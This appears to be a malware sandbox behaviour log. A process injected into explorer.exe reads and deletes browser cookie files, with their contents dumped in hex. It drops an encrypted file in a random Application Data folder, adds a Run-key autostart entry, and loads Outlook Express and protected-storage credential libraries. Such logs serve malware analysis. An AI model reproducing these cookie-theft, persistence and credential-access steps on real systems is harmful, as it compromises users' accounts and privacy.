File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Offset: none Length: 115 Value: 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1988772467
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988772829
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988774014
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Offset: none Length: 113 Value: 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1988774121
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988774936
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988775373
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Offset: none Length: 112 Value: 55 49 44 0A 62 39 32 34 35 38 31 2D 36 35 2E 31 39 39 2E 36 33 2E 32 35 2D 31 33 30 36 31 35 38 37 34 37 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 33 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 30 31 34 38 35 35 36 38 success or wait 1988775479
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988776108
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988777129
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Offset: none Length: 90 Value: 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1988777236
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988777862
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988778935
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Offset: none Length: 111 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1988779042
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1988779705
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 2B50000 Length: 294E9C8 Allocation Type: null Protection: page read and write success or wait 1988780760
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Offset: none Length: 117 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1988780867
System info queried Type: CurrentTimeZoneInformation success or wait 1988782402
Mutant created Name: \BaseNamedObjects\Global\{C5C44599-7D04-EAB2-185B-81F8EE8A3A3D} success or wait 1988783177
Privilege adjusted Privilege: Security On or off: on success or wait 1988785156
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1988786910
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1988787689
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1988790271
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1988791747
Section loaded Path: \KnownDlls\rsaenh.dll Access: write and read and execute Type: unknown Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid object name not found 1989151045
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and write and read and execute Type: image Baseaddress: 68000000 Size: 221184 Protection: read write Mapped to pid: own pid success or wait 1989159788
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 1989177670
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410696
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410801
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989410895
File write Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Offset: none Length: 5 Value: 3E C9 07 4F 00 success or wait 1989410992
File write Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Offset: none Length: 2623 Value: A7 7C 90 C9 22 56 2F F9 40 3C 90 C5 A3 70 CA 24 B8 36 1D E6 A0 E4 98 0D 1E 3A B9 C1 17 8A C8 0D CD FE 7A B8 8C 5C 4E 10 3D 0D AD B6 E5 FE 11 67 49 E5 F2 78 E5 CA B0 59 41 BA 45 99 4C 71 1F 90 E6 53 C5 E3 2B 6A F6 BD 62 D6 0A EA DC 25 05 3B DA 17 2A 03 31 83 0F F4 3B 88 3D 11 62 59 0A 78 3A FC B6 80 success or wait 1989412571
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1989416410
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989419513
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1989419862
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989420304
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1989420648
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989421263
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1989421623
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989422101
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1989422442
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989423033
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1989423373
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989423814
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1989424207
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989424803
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1989425491
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989425906
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1989426246
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989426869
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1989427211
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989427655
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1989428345
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989428945
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1989429286
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989429729
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1989430068
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989430665
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1989431007
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989431481
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt success or wait 1989431822
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989432423
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1989432763
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989433205
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1989433561
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989434161
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1989434519
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989434961
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1989435301
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989435899
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1989436241
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989436714
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt success or wait 1989437055
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989437654
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1989437995
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989438434
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt success or wait 1989438774
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989439370
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1989439711
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989440148
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt success or wait 1989440489
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989441190
File other operation Disposition: BasicInformation Data : 00000000000000000000000000000000000000000000000000000000000000008000000000000000 Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1989441533
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989441966
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt success or wait 1989442313
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989442955
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989443751
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1989449834
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989451819
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989452580
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989453586
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989454341
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989455247
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989456002
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989456908
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989457698
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989458602
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989459356
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989460314
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989461374
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989462295
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989463081
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989464380
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989465139
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989466044
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989466797
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989467734
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989468487
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989469735
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989470502
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989471424
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989472275
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989473330
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989474094
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989475133
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989475937
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989476856
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989477609
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989478632
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1989479386
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 2B50000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 1989521533
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: write and read and execute Type: commit Baseaddress: 2B50000 Size: 253952 Protection: execute Mapped to pid: own pid success or wait 1989523906
Section loaded Path: C:\WINDOWS\system32\msoeacct.dll Access: query and write and read and execute Type: image Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid success or wait 1989524810
Section loaded Path: \KnownDlls\MSOERT2.dll Access: write and read and execute Type: unknown Baseaddress: 68810000 Size: 270336 Protection: read write Mapped to pid: own pid object name not found 1989526714
Section loaded Path: C:\WINDOWS\system32\msoert2.dll Access: query and write and read and execute Type: image Baseaddress: 76880000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 1989528707
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2B60000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1989544751
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2B60000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989545829
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2B60000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989546779
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1989563244
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2B80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989564303
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2B80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1989565270
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 1989580280
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 65536 Protection: execute Mapped to pid: own pid success or wait 1989582234
Section loaded Path: C:\WINDOWS\system32\acctres.dll Access: query and write and read and execute Type: image Baseaddress: 71780000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1989583295
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts Name: NULL success or wait 1989611396
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1989615001
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 512000 Protection: execute Mapped to pid: own pid success or wait 1989616679
Section loaded Path: C:\Program Files\Common Files\System\wab32.dll Access: query and write and read and execute Type: image Baseaddress: 470D0000 Size: 528384 Protection: read write Mapped to pid: own pid success or wait 1989617501
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1989626034
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: write and read and execute Type: commit Baseaddress: 2BA0000 Size: 249856 Protection: execute Mapped to pid: own pid success or wait 1989627733
Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 1989628625
System info queried Type: ProcessInformation success or wait 1989741685
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2B80000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1989744223
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 1989817399
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 53248 Protection: execute Mapped to pid: own pid success or wait 1989819268
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: query and write and read and execute Type: image Baseaddress: 608A0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 1989820296
Section loaded Path: C:\WINDOWS\system32\msident.dll Access: read Type: commit Baseaddress: 2B80000 Size: 53248 Protection: readonly Mapped to pid: own pid success or wait 1989827459
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 1989844568
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: write and read and execute Type: commit Baseaddress: 2B80000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 1989849446
Section loaded Path: C:\WINDOWS\system32\msidntld.dll Access: query and write and read and execute Type: image Baseaddress: 60890000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 1989850652
System info queried Type: ProcessInformation success or wait 1989859291
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2BE0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1989862173
Section loaded Path: \KnownDlls\PSTOREC.DLL Access: write and read and execute Type: unknown Baseaddress: 2BE0000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 1989866440
Section loaded Path: C:\WINDOWS\system32\pstorec.dll Access: query and write and read and execute Type: image Baseaddress: 5E0C0000 Size: 53248 Protection: read write Mapped to pid: own pid success or wait 1989868416
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 1318912 Protection: execute Mapped to pid: own pid success or wait 1989926876
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: write and read and execute Type: commit Baseaddress: 2C70000 Size: 1318912 Protection: execute Mapped to pid: own pid success or wait 1989929403
Section loaded Path: C:\Program Files\Outlook Express\msoe.dll Access: query and write and read and execute Type: image Baseaddress: 60330000 Size: 1347584 Protection: read write Mapped to pid: own pid success or wait 1989930374
Section loaded Path: \KnownDlls\INETCOMM.dll Access: write and read and execute Type: unknown Baseaddress: 60330000 Size: 1347584 Protection: read write Mapped to pid: own pid object name not found 1989937959
Section loaded Path: C:\WINDOWS\system32\inetcomm.dll Access: query and write and read and execute Type: image Baseaddress: 76150000 Size: 712704 Protection: read write Mapped to pid: own pid success or wait 1989939986
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 1990277613
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1990509018
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990510127
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 2BE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1990516082
Section loaded Path: C:\WINDOWS\system32\inetres.dll Access: write and read and execute Type: commit Baseaddress: 2BF0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 1990562375
